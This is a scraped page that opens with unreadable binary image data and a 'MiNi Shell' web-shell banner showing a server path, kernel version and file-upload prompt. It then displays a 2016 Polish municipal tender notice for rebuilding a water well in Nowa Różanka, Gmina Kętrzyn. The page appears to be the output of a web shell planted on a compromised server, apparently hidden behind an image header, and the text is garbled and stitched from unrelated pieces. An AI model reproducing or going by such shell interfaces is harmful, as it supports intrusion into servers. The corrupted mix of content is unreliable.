JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161005/317823-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 317823 - 2016
              z dnia 2016-10-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kętrzyn: Modernizacja ujęcia wody w miejscowości Nowa Różanka, Gmina Kętrzyn, działka Nr 132/1.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy Kętrzyn, krajowy numer identyfikacyjny
              53553400000, ul.
              ul. Kościuszki 
              2,
              11400  
              Kętrzyn, woj.
              warmińsko-mazurskie, państwo
              , tel.
              089 7512474 w. 17, e-mail
              admidnitrator@bip.ketrzyn.sprint.com.pl, faks
              897 512 746.
              <br />
              Adres strony internetowej (URL): bip.gminaketrzyn.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bip.gminaketrzn.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.gminaketrzn.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />W formie pisemej za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r. - Prawo pocztowe, osobiście lub za pośrednictwem posłańca lub kuriera.<br />
                Adres:
                <br />Urząd Gminy Kętrzyn, ul. Kościuski 2, 11-400 Kęrzyn</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Modernizacja ujęcia wody w miejscowości Nowa Różanka, Gmina Kętrzyn, działka Nr 132/1.<br /><b>Numer referencyjny: </b>RGG.272. 57.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>
1. Przedmiotem zamówienia jest modernizacja ujęcia wody w miejscowości Nowa Różanka, Gmina Kętrzyn, działka Nr 132/1 , której zakres rzeczowy obejmuje : 
      
      - wykonanie  robót  geologicznych  w celu wykonania otworu studziennego Nr 1A oraz w celu likwidacji otworu studziennego Nr 1, na terenie ujęcia wody podziemnej w miejscowości Nowa Różanka, działka Nr 132/1, Gmina Kętrzyn;
      -  wykonanie obudowy studni i instalacji technologicznej studni głębinowej nr 1A; 
      -  dostawa i montaż podwodnego agregatu pompowego;
      -  podłączenie studni głębinowej Nr 1A do instalacji technologicznej stacji uzdatniania wody, tj. wykonanie przyłącza  wodociągowego z  rur    PVC  110  PN  10  DN  110x4,2 mm      o  długości  L  =  13,50 mb wraz z opomiarowaniem ilości pobieranej wody; 
      -  budowa zalicznikowego elektroenergetycznego przyłącza kablowego n.n. zasilającego
studnię głębinową Nr 1A wraz z rezerwowym kablem sterowniczym.

2. Wielkość i zakres zamówienia.
2.1 Roboty geologiczne - wykonanie otworu studziennego Nr 1A.

Otwór studzienny Nr 1A należy wykonać systemem udarowym w kolumnie rur fi 508mm   
do głębokości 47 m, a następnie w kolumnie rur fi 457 mm do głębokości końcowej, tj. 89m.
Kolumna rur fi 508 mm powinna zostać pozostawiona wodoszczelnie w korku iłowym.   
Po zafiltrowaniu otworu kolumna z rur fi 457 mm  powinna być usunięta z otworu.      

 W czasie próbnego pompowania otworu studziennego należy pobrać próbę wody do badań
fizyko-chemicznych i bakteriologicznych.

Po odwierceniu otworu do projektowanej głębokości należy zainstalować filtr kolumnowy
fi 298 mm o następujących wymiarach :
- rura podfiltrowa                                      - 4,0 m,
- część robocza (siatka stilonowa)            - 26,0m (razem z międzyfiltrowymi - ok. 3m),
- rura nadfiltrowa                                      - 59,0m
Filtr powinien być wykonany z rury stalowej lub z tworzywa sztucznego, perforowanej
i owiniętej siatką stilonową na podkładzie ze sznurka powlekanego.

Po odwierceniu i zafiltrowaniu otworu należy przeprowadzić próbne pompowanie. Pompowanie powinno składać się z dwóch etapów: pompowania oczyszczającego i pompo-wania pomiarowego.

Wykonany otwór studzienny powinien być zaniwelowany i zainwentaryzowany geodezyjnie.

Szczegółowy zakres prac i ich ilość określa projekt robót geologicznych.

2.2 Roboty geologiczne - likwidacja otworu studziennego Nr 1.

Likwidację otworu studziennego Nr 1 należy wykonać przez usunięcie kolumny filtrowej,
w wyniku czego nastąpi samozasyp, a następnie usunięcie kolumny rur fi 14" i 16"  oraz
iłowanie otworu.

Szczegółowy zakres prac i ich ilość określa projekt robót geologicznych.

2.3  Wykonanie obudowy studni i instalacji technologicznej studni głębinowej nr 1A.
Obudowa studni głębinowej. Część konstrukcyjna. 

Obudowa  studni  wierconej  z  kręgów  żelbetowych prefabrykowanych  zagłębionych w ziemi, o średnicy 1500mm. 
Płyta fundamentowa wylewana na mokro z betonu B-15, częściowo dozbrajana prętami stalowymi  fi= 4,5mm, na podkładzie betonowym gr. 15 cm 
Pod otworem przy ścianie przewidziano drabinę wewnętrzną , z rur stalowych fi 25 mm.

Część  instalacyjna - technologia.
Wewnątrz obudowy znajdują  się: 
- zakończenie otworu wiertniczego, 
- głowica studni wierconej, 
- przewód tłoczony podwodnego agregatu pompowego,
- zawór zwrotny kołnierzowy, fi 80mm,
-  zasuwa żeliwna kołnierzowa z kółkiem , fi 80mm,
- wodomierz śrubowy, fi 80mm,
- punkt poboru wody. 

Zakończenie otworu wiertniczego:
Po zabetonowaniu i uszczelnieniu dna obudowy pozostawioną  rurę otworu wiertniczego należy uciąć na wysokości 350 mm nad dnem. 
Głowica studni:
Urządzeniem  szczelnie  zamykającym  otwór  studzienny,  a  jednocześnie  przenoszącym  ciężar  zespołu pompowego na dno obudowy będzie głowica studni wierconej, której wierzch winien znajdować się na wysokości około 300mm nad dnem obudowy. W pokrywie głowicy powinien być wykonany jeden otwór kontrolny o średnicy 40mm zamykany fajką stalową, fi 50mm w celu badania położenia lustra wody w studni,    oraz  drugi  otwór  fi  40  mm  dla  przeprowadzenia  przewodu  elektrycznego  zasilającego  silnik pompy głębinowej. 

Kolumna tłoczna. 
Kolumnę tłoczną  wykonać z rur stalowych o zew średnicy 88,9x2 mm w odcinkach 6,0 m zakończonych kołnierzami. Łączenie kołnierzy stalowych za pomocą  śrub M-16. 
Podwodny agregat pompowy .
Pompa głębinowa typu SP 46-7, 11 kW.  

UWAGA:  Poziom  usytuowania  (zawieszenia)  agregatu  pompowego  i  parametry  techniczne  pompy dokładnie  zostaną  ustalone  po  wykonaniu  odwiertu i udokumentowaniu  zasobów.  Na  etapie  projektu przyjęto agregat pompowy o wydajności  49 m/h i wysokości podnoszenia 40 m.

Zabezpieczenie  odpowiedniej  mocy    energii  elektrycznej    nastąpi    poprzez  stacjonarną  rozdzielnie usytuowaną   w   budynku   SUW.   Zakończenie   instalacji   technologicznej   stanowił      będzie   węzeł wodociągowy.  Węzeł  zlokalizowany będzie w pomieszczeniu SUW w odległości około 7 m od obudowy studni.  Nie   przewiduje się    wykonania nadziemnego  hydrantu  ppoż.  o    średnicy  80mm.

Szczegółowy zakres prac i ich ilość określa projekt budowlany.

2.4 Wykonanie przyłącza  wodociągowego.

Przyłącze  wodociągowe  wykonać  z  rur    PVC  110  PN  10  DN  110x4,2 mm  o  długości  L  =  13,50 mb, łączonych  na  wcisk.  
Opomiarowanie wykonać w obudowie studni zachowując normatywne odległości. Do pomia-ru pobieranej wody dobrano wodomierz  śrubowy  DN  80  mm  Qn  50  m3/h.   Za   wodo-mierzem   zamontować   kulowe   zawory odcinające  DN  80  mm.  Za  zaworem  usytuowanym  za  wodomierzem  zainstalować  zawór  zwrotny antyskażeniowy DN 80 mm  typu EA. 
Próby i odbiory.
Próbę  szczelności  przyłącza  oraz  jego  odbiór  wykonać  zgodnie    z  postanowieniami  PN-81/B-10725.  Próbę przeprowadzić na ciśnienie 0,8 MPa. 
Po  uzyskaniu  pozytywnych  wyników  próby  szczelności  przewód  wodociągowy  poddać  dezynfekcji podchlorynem  sodu  i  przepłukać  czystą  wodą  wodociągową.  Po  dokonaniu  tych  czynności  wodę  z przyłączenia   poddać   badaniu   bakteriologicznemu   w   laboratorium   Terenowej   Stacji   Sanitarno   Epidemiologicznej.  Czynności  omówione  powyżej  powtarzać  aż  do  uzyskania  pozytywnego  wyniku badania dostarczanej wody.

Szczegółowy zakres prac i ich ilość określa projekt budowlany.




2.5  Budowa zalicznikowego elektroenergetycznego przyłącza kablowego.

Zakres prac :
- wykonanie zalicznikowego przyłącza kablowego n.n. kablem YAKXS 4x25mm2
  o długości 32m;
- wykonanie rezerwowego kabla sterowniczego YKY 3x 2,5mm2 o długości 32 m,
- wykonanie ochrony od porażeń.

Szczegółowy zakres prac i ich ilość określa projekt budowlany.

2.6 Zamówienie obejmuje obsługę geodezyjną robót, w tym wykonanie geodezyjnej inwenta-ryzacji powykonawczej, oraz wykonanie badań, pomiarów i dokumentacji określonej 
w dokumentacji opisującej przedmiot zamówienia.

2.7  Wykonawca   zapewni   w   ramach   dostawy   pompy   głębinowej   serwis   gwarancyjny i  pogwarancyjny. 

2.8 Wykonawca zapewni kierowanie pracami wiertniczymi przez osobę posiadającą stwierdzone kwalifikacje do dozoru geologicznego i kierowania wierceniami do głębokości 100 m.
 
2.9 Zamawiający wymaga rękojmi  na wykonane roboty budowlane, zastosowane materiały,  na okres co najmniej 36 miesięcy i nie dłuższy niż 84 miesiące,  liczony od terminu końco-wego odbioru robót .  

2.10 Wykonawca  udzieli  zamawiającemu  gwarancji  jakości  na  dostarczone  urządzenia  na okres nie krótszy niż 12 miesięcy i nie krótszy niż okres gwarancji producenta urządzeń.  Wymagane przeglądy w okresie gwarancyjnym wykonawca wykona bezpłatnie. 

2.11 Uprawnienia  z  tytułu  rękojmi  za  wady  fizyczne  przedmiotu  zamówienia  wygasają  z upływem   okresu,   na   który   wykonawca   udzielił   rękojmi   na   wykonany      przedmiot zamówienia.  Bieg  okresu    rękojmi  rozpocznie  się  z  dniem spisania końcowego protokołu odbioru robót  i przekazania przedmiotu zamówienia do eksploatacji.  W okresie rękojmi  wszelkie naprawy i przeglądy robót   będących   przedmiotem   zamówienia,   będą   wykonywane   wyłącznie   kosztem   i  staraniem Wykonawcy.     

2.12  Do obowiązków wykonawcy, w ramach przysługującego mu wynagrodzenia, należy w szczególności  :
   1) wykonanie  i  utrzymanie  niezbędnego zaplecza, podłączenia mediów we własnym
        zakresie i na swój koszt oraz pokrycia kosztów ich eksploatacji przez cały okres trwania
        budowy,
   2) zabezpieczenie instalacji i urządzeń na terenie budowy i w jego bezpośrednim otoczeniu
       przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, 
   3) informowanie Zamawiającego lub osoby przez niego upoważnionej o terminie wyko- 
       nania robót ulegających zakryciu,   
   4) przekazanie Zamawiającemu na jego żądanie materiałów rozbiórkowych, a w przeciw-
        nym razie  zagospodarowanie ich we własnym zakresie, a w razie konieczności również
        zutylizowanie,  
   5) uporządkowanie, po zakończeniu prac, terenu budowy oraz innych wykorzystywanych
        przez wykonawcę terenów,
   6) ponoszenie pełnej odpowiedzialności za  przestrzeganie przepisów BHP, ochronę p.poż  
        i dozór mienia na terenie budowy, jak i za wszelkie szkody powstałe w trakcie trwania
        robót   i mających związek z prowadzonymi robotami,  chyba że wyłącznie odpowie-
        dzialna za ich powstanie jest osoba trzecia, za którą Wykonawca nie ponosi odpowie-
        dzialności, 
    7) ponoszenie wyłącznej odpowiedzialności za wszelkie szkody będące następstwem
        niewykonania lub nienależytego wykonania przedmiotu umowy, 
    8) umożliwienie Zamawiającemu lub osobie upoważnionej kontroli terenu budowy w
        każdym czasie,
    9) stosowanie się do poleceń Zamawiającego lub osoby upoważnionej, zgodnych z zapi-
        sami  umowy i przepisami prawa,
  10) zapewnienie  kierowania robotami budowlanymi przez osoby posiadające stosowne
        kwalifikacje zawodowe i wymagane uprawnienia budowlane,
  11) wykonanie wszystkich prac potrzebnych dla udokumentowania wymaganej jakości 
        wykonanych robót i wbudowanych materiałów,
  12) usunięcie na swój koszt wad i usterek stwierdzonych w okresie rękojmi za wady 
        i w okresie gwarancji jakości.

3.  Ze  względu  na  specyfikę  przedmiotu  zamówienia,  w  celu  dokładnego  opisania  przedmiotu zamówienia zostały   precyzyjnie   podane   typy,   parametry   techniczne,   funkcjonalność   oraz   sposób wykonania.  Przedstawione  w  dokumentacji  projektowej  urządzenia  techniczne,  wyroby  i materiały ze wskazaniem producenta lub nazw własnych należy traktować jako przykładowe. 
Zamawiający   dopuszcza   rozwiązania   równoważne   tzn.   ujęcie   w   ofercie,   a   nastę-pnie zastosowanie  innych  materiałów  i  urządzeń  niż  podane  w  dokumentacji  projektowej  pod warunkiem  zapewnienia  parametrów  technicznych  takich  samych  lub  nie  gorszych  niż określone  w  dokumentacji.  Zastosowane  materiały  i  urządzenia  równoważne  nie  mogą zmienić   funkcjonalności   czy   standardu   zaprojektowanych   rozwiązań   oraz   umożliwić uzyskanie  efektu  zamierzonego  przez  Zamawiającego  (technicznego,  ekonomicznego  i ekologicznego). Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego   materiały       i   urządzenia   spełniają   wymagania   określone   przez   Zamawiającego.         
Należy w takim przypadku załączyć do oferty wykaz materiałów i urządzeń równo-ważnych    z podaniem  materiału  lub  urządzenia,  którego  dotyczą,  załączając  komplet  dokumentów dotyczących  materiałów  lub  urządzeń  równoważnych  stwierdzających  jednoznacznie  ich równoważność. 

4.  Jeżeli   przywołane zostały  Polskie  Normy dopuszcza  się  normy  równoważne  opisy-wanym,  normy  innych  państw  członkowskich Europejskiego Obszaru Gospodarczego przenoszące normy europejskie, europejskie aprobaty techniczne,  wspólne  specyfikacje  techniczne,  normy  międzynarodowe,  inne  techniczne systemy  odniesienia  ustanowione  przez  europejskie  organy  normalizacyjne.  W  przypadku braku   Polskich   Norm   przenoszących   normy   europejskie   lub   norm   innych   państw członkowskich  Euro-pejskiego  Obszaru  Gospodarczego  przenoszące  normy  europejskie  oraz aprobat, specyfi-kacji, norm i systemów, o których mowa wyżej, uwzględnia się w kolejności Polskie Normy, polskie aprobaty techniczne, polskie specyfikacje techniczne. 
  
5.  Nie wskazanie w ofercie propozycji zastosowania urządzeń i materiałów równoważnych oraz metod   wykonania   przedmiotu   zamówienia,   oznaczać   będzie,   że   Wykonawca   wykona przedmiot zamówienia przy zastosowaniu urządzeń i materiałów przyjętych w doku-mentacji projektowej.  

6.  Wymagane świadectwa i atesty. 
Oferowany  przez  wykonawcę  asortyment  musi  posiadać  certyfikat  wydany  przez  jednostkę notyfikowaną w UE (z aktualna datą ważności i identyfikującą producenta i typ wyrobu) lub deklarację zgodności z wymogami dyrektyw Unii Europejskiej. 

7. Załaczniki do niniejszego Opisu przedmiotu zamówienia stanowią:
   1) projekty budowlane:
       - obudowy studni i przyłącza wodociągowego, 
       - zalicznikowego elektroenergetycznego przyłącza kablowego,      
   2) projekt robót geologicznych w celu wykonania otworu studziennego Nr 1A oraz w celu
       likwidacji otworu studziennego Nr 1, na terenie ujęcia wody podziemnej w miejscowości
       Nowa Różanka,
   3) przedmiary robót dotyczące wykonania:
        - otworu studziennego nr 1A, likwidacja otworu studziennego nr 1,  
        - obudowa studni głębinowej z przyłączem wodociągowym,
        - zalicznikowe elektroenergetycznego przyłącze kablowe, 
    4) specyfikacje techniczne :
       - wykonania obudowy studni i przyłącza wodociągowego,
       - wykonania zalicznikowego elektroenergetycznego przyłącza kablowego, 
       - wykonania robót geologicznych w celu wykonania otworu studziennego Nr 1A oraz 
          w celu likwidacji otworu studziennego Nr 1, na terenie ujęcia wody podziemnej 
          w miejscowości Nowa Różanka,

8. Przedmiar robót należy traktować jako opracowanie pomocnicze, niestanowiące jedynej podstawy do ustalenia ceny ofertowej.    Jeżeli  istnieją  roboty lub czynności,  które  Wykonawca  przy zachowaniu  należytej  staranności  może  przewidzieć  na  etapie  zapoznania  się  z  dokumentacją przetargową, w tym w szczególności z dokumentacją projektową, zobowiązany jest uwzględnić je w cenie ofertowej.
    

9. W przypadku rozbieżności w ustaleniach poszczególnych dokumentów opisujących zamówienie  należy stosować następującą kolejność  ważności tych dokumentów :
  1) niniejsza SIWZ z Opisem przedmiotu zamówienia, wzorem umowy oraz ewentualnymi
      wyjaśnieniami zamawiającego,
  2) projekt robót geologicznych, 
  3) projekt budowlany, 
  4) przedmiar robót,
  5) specyfikacja techniczna.
Nie zawarcie określonych wymagań we wszystkich dokumentach opisujących zamówienie nie będzie traktowane jako rozbieżność. Wymagania  wyszczególnione  choćby  w jednym     z  powyższych dokumentów są  obowiązujące  dla  Wykonawcy. 

10. Zamówienie zostanie zrealizowane z materiałów wykonawcy. Wykonawca ponosi  odpowiedzialność za wszystkie materiały i urządzenia używane do wykonania zamówienia.
    
11.  Zamawiającemu przysługuje prawo wprowadzenia zmian w dokumentacji projektowej    
i zlecenia wykonawcy wykonania robót zamiennych.  Wykonawca zobowiązany jest
zrealizować zamówienie zgodnie ze zleconymi zmianami, jeżeli zmiany te nie powodują 
wzrostu kosztów realizacji zamówienia.

12. Oznaczenie przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
 
       45111200-0   roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
       45262200-3   fundamentowanie i  wiercenie studni wodnych,
       45231300-8   roboty budowlane w zakresie budowy wodociągów i rurociągów
                             do odprowadzania ścieków,
       45311000-0   roboty w zakresie okablowania oraz instalacji elektrycznych,
       45332200-5   roboty instalacyjne hydrauliczne

13.  Zamawiający, na podstawie art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę, w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r.- Kodeks pracy (Dz.U. z 2014 r., poz. 1502 z późn. zm.), osób wykonujących czynności  związane z pracami geologicznymi, w tym pracami wiertni-czymi oraz osób wykonujących czynności w zakresie  wykonywania  dozoru  i  kierowania  pracami  geologicznymi, zgodnie z wymogami  ustawy  z  dnia    9  czerwca  2011  r.      Prawo geologiczne  i  górnicze    (  tekst jednolity  Dz.  U.  z  2016  r.  poz.  1131 ).
<br /><br /><b>II.5) Główny kod CPV: </b>45262200-3<br /><b> Dodatkowe kody CPV:</b>45111200-0,
                45231300-8,
                45311000-0,
                45332200-5<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 58<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Przedmiot zamówienia należy zrealizować w terminie określonym w ofercie wykonawcy
lecz nie dłuższym niż 58 dni od dnia zawarcia umowy.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
